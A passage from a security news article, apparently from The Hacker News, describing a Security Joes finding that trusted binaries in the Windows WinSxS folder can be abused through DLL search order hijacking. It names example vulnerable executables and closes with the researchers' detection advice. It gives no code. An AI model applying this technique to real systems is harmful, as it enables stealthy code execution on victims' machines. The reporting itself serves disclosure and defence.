The folder "C:\Windows\System32"
The folder "C:\Windows\System"
The folder "C:\Windows"
The current working directory
Directories listed in the system's PATH environment variable
Directories listed in the user's PATH environment variable
The novel twist devised by Security Joes targets files located in the trusted "C:\Windows\WinSxS" folder. Short for Windows side-by-side, WinSxS is a critical Windows component that's used for the customization and updating of the operating system to ensure compatibility and integrity.
Cybersecurity "Our discovery diverges from this path, unveiling a more subtle and stealthy method of exploitation." The idea, in a nutshell, is to find vulnerable binaries in the WinSxS folder (e.g., ngentask.exe and aspnet_wp.exe) and combine it with the regular DLL search order hijacking methods by strategically placing a custom DLL with the same name as the legitimate DLL into an actor-controlled directory to achieve code execution. As a result, simply executing a vulnerable file in the WinSxS folder by setting the custom folder containing the rogue DLL as the current directory is enough to trigger the execution of the DLL's contents without having to copy the executable from the WinSxS folder to it. Security Joes warned that there could be additional binaries in the WinSxS folder that are susceptible to this kind of DLL search order hijacking, necessitating that organizations take adequate precautions to mitigate the exploitation method within their environments. "Examine parent-child relationships between processes, with a specific focus on trusted binaries," the company said. "Monitor closely all the activities performed by the binaries residing in the WinSxS folder, focusing on both network communications and file operations."
"This approach represents a novel application in cybersecurity: traditionally, attackers have largely relied on well-known techniques like DLL search order hijacking, a method that manipulates how Windows applications load external libraries and executables," Ido Naor, co-founder and CEO of Security Joes, said in a statement shared with The Hacker News.